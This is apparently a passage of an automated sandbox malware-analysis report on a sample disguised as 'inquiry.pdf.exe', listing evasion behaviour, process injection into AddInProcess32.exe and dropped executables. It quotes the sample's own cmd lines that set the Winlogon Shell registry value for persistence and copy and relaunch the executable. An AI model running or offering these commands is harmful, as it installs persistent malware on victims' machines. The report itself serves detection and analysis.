            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Uses ping.exe to sleep
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Users\user\Desktop\inquiry.pdf.exe TID: 4132Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\user\Desktop\inquiry.pdf.exe TID: 3520Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\inquiry.pdf.exe TID: 5880Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exe TID: 3624Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exe TID: 4420Thread sleep time: -75000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1920Thread sleep count: 60 > 30
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe TID: 2768Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe TID: 1668Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\inquiry.pdf.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\inquiry.pdf.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeWindow / User API: threadDelayed 3504
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\inquiry.pdf.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeThread delayed: delay time: 922337203685477
            Source: inquiry.pdf.exe, 00000000.00000003.256866785.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485643024.0000000000EA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\inquiry.pdf.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 900000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 901000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 919000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 91E000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A54000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A57000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A59000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6AB008
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 419000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41E000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 554000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 557000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 559000
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AF6008
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 900000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,
            Source: C:\Users\user\Desktop\inquiry.pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\Desktop\inquiry.pdf.exe" "C:\Users\user\AppData\Roaming\glonkjhg.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\glonkjhg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 7
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\glonkjhg.exe,"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 12
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\glonkjhg.exe C:\Users\user\AppData\Roaming\glonkjhg.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Roaming\glonkjhg.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exeProcess created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe "C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe"
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Users\user\Desktop\inquiry.pdf.exe VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\inquiry.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
